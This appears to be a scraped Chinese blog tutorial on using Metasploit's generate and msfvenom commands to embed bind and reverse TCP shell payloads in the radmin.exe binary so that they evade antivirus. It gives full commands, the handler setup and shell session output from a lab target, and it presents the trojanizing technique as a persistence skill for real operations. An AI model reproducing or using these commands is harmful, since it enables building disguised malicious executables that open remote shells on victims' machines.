zoukankan      html  css  js  c++  java
  • 记一次payload绕过电脑管家免杀

    一、msf命令提示符下generate命令生成

    1、首先可以使用show payloads命令查看所有的payload,然后使用use命令选中其中一个。




    2、使用generate -h查看命令帮助


    generate常用选项解释:
    -b 去掉坏字符,例如:-b ‘x00xff’
    -e 设置编码方式,可以使用show encoders命令查看所有编码方式
    -f 输出格式,不设置默认为ruby语言。例如-f c或-f exe
    -i 设置编码次数,一般用作多次编码免杀
    -k 保持源模版行为,并将payload作为一个线程注入到一个进程中,常和-x配合使用
    -o 输出文件名
    -x 定义一个文件作为模版
    3、generate命令生成windows/shell_bind_tcp的payload,并注入到radmin程序中

    msf5 payload(windows/shell_bind_tcp) > generate -k -x /usr/share/windows-binaries/radmin.exe -f exe -o rradin.exe
    [*] Writing 1319424 bytes to rradin.exe...
      
    4、生成payload,在靶机打开rradmin.exe后,指定的4444端口被打开,远程使用nc连接如下图

    luredeMacBook-Pro:~ lure$ nc 10.10.10.166 4444
    Microsoft Windows [�汾 6.1.7601]
    ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ��

    C:UserslovelyDesktop>whoami
    whoami
    lovely-pclovely

    C:UserslovelyDesktop>

     
     

    5、有坑注意。msf的payload中有windows/shell/bind_tcp和windows/shell_bind_tcp,其为两个作者所做,经过测试,在使用nc连接windows/shell/bind_tcp生成的payload时,会产生连接成功,但无返回数据的bug。
    二、kali下使用msfvenom命令生成

    1、使用–list payloads选项查看所有payload

    root@kali2020:~# msfvenom --list payloads

    Framework Payloads (562 total) [--payload <value>]
    ==================================================

        Name                                                Description
        ----                                                -----------
        aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
        aix/ppc/shell_find_port                             Spawn a shell on an established connection
        aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)
        aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
        android/meterpreter/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP
        ......

      

    2、使用–list-options查看可用参数

    root@kali2020:~# msfvenom -p windows/shell_reverse_tcp --list-options
    Options for payload/windows/shell_reverse_tcp:
    =========================


           Name: Windows Command Shell, Reverse TCP Inline
         Module: payload/windows/shell_reverse_tcp
       Platform: Windows
           Arch: x86
    Needs Admin: No
     Total size: 324
           Rank: Normal

    Provided by:
        vlad902 <vlad902@gmail.com>
        sf <stephen_fewer@harmonysecurity.com>

    Basic options:
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST                      yes       The listen address (an interface may be specified)
    LPORT     4444             yes       The listen port

     

    3、使用msfvenom生成payload并注入到radmin进程中

    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe

        1

    root@kali2020:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 324 bytes
    Final size of exe file: 1319424 bytes
    Saved as: r2admin.exe


    4、靶机运行r2admin,并在攻击机用msfconsole接收反弹shell

    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
    payload => windows/shell_reverse_tcp
    msf5 exploit(multi/handler) > set lhost 10.10.10.136
    lhost => 10.10.10.136
    msf5 exploit(multi/handler) > set lport 9876
    lport => 9876
    msf5 exploit(multi/handler) > run

    [*] Started reverse TCP handler on 10.10.10.136:9876
    [*] Command shell session 1 opened (10.10.10.136:9876 -> 10.10.10.166:50097) at 2020-07-15 23:45:36 -0400

    pwd
    pwd
    'pwd' �����ڲ����ⲿ���Ҳ���ǿ����еij���
    �������ļ���

    C:UserslovelyDesktop>whoami
    whoami
    lovely-pclovely

    三、小结

    msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。

  • 相关阅读:
    cygwin下安装scws
    atitit.提升软件开发的生产力关健点-------大型开发工具最关健
    atitit。mssql sql server 转换mysql 及 分页sql ast的搭建
    atitit.手动配置列表文件的选择and 数据的层次结构 attilax总结最佳实践--yaml
    atitit.获取connection hibernate4
    atitit.新增编辑功能 跟orm的实现 attilax p31
    atitit.自动生成数据库结构脚本,或者更换数据库,基于hibernate4
    atitit.Windows Server 2003 2008 2012系统的新特性 attilax 总结
    atitit.orm的缺点与orm框架市场占有率,选型attilax总结
    atitit。解决 No suitable Log constructor。。NoClassDefFoundError: org/apache/log4j/Category 找不到类的
  • 原文地址:https://www.cnblogs.com/lzkalislw/p/15175156.html
Copyright © 2011-2022 走看看